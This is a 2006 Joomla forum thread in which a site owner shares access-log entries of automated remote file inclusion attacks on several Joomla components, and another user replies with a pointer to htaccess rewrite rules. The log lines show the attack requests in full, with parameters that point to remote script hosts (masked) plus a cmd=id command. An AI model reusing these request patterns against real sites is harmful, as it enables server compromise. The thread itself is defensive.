Joomla! Discussion Forums

I was just rocked by something that I've stopped temporarily before too much mail got out. I was lucky to find my server crawl instantly and nail EXIM before too much went out. Here is what I've found (I have hidden the address for the ultimate file) -- UPDATE: Looking at the time I was getting nailed with "undeliverable message" warnings it looks like the remository extended is the culprit....

Looks like they are hitting MTree (I have version 1.59), Remository Extended (I will replace with the regular), and Artlinks (I don't have this installed?), Savant2?, HUNDREDS of requests to hit Comprofiler... is there any way to filter out attempts to hack a Joomla server in trying to hit the mos_config? This is just killing my server.

Our troops shouldn't be in Iraq... they should be out seeking these @#$@#$s....


81.24.26.185 - - [26/Aug/2006:18:28:57 -0400] "GET /administrator/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://XXXXXXXXXXXXXX/gi8ani/exploit.txt? HTTP/1.1" 301 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

81.215.225.126 - - [26/Aug/2006:15:04:06 -0400] "GET /administrator/component/com_remository/admin.remository.php?mosConfig_absolute_path=http://XXXXXXXXX/test.tar.gz?&list=1&cmd=id HTTP/1.0" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

81.215.225.126 - - [26/Aug/2006:14:59:50 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://XXXXXXXX/test.tar.gz?&list=1&cmd=id HTTP/1.0" 200 46 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

58.224.150.102 - - [26/Aug/2006:12:36:39 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://XXXXXXXXXXX/Poker/gyihhsqu.txt? HTTP/1.0" 200 46 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

61.3.96.8 - - [26/Aug/2006:12:36:22 -0400] "GET /com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http:XXXXXXXXX/Poker/gyihhsqu.txt? HTTP/1.0" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


60.190.243.175 - - [26/Aug/2006:12:35:58 -0400] "GET /Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://XXXXXXXXXX/Poker/gyihhsqu.txt? HTTP/1.0" 301 0 "-" "-"

201.248.90.194 - - [26/Aug/2006:12:34:45 -0400] "GET /Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://XXXXXXXX/Poker/gyihhsqu.txt? HTTP/1.0" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

201.248.90.194 - - [26/Aug/2006:12:34:40 -0400] "HEAD /Savant2_Plugin_textarea.php?mosConfig_absolute_path= HTTP/1.0" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"  [WHAT IS THIS????]

212.55.155.34 - - [26/Aug/2006:07:18:22 -0400] "GET /component/option,com_comprofiler/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://XXXXXXXX/e.txt? HTTP/1.1" 200 25277 "-" "libwww-perl/5.803"

http://forum.joomla.org/index.php/topic,75376.0.html

Those rewrite rules are effective enough that it was decided to include them into the default htaccess.txt in Joomla! 1.0.11.  I know of several high traffic sites running them without any problems.  I hope it helps you too.

Perfect and muchas gracias. This is what I was looking for and will experiment with it. Incredible how many of these automated attacks are going on and CNET reported an increase in zombies of about 10% recently!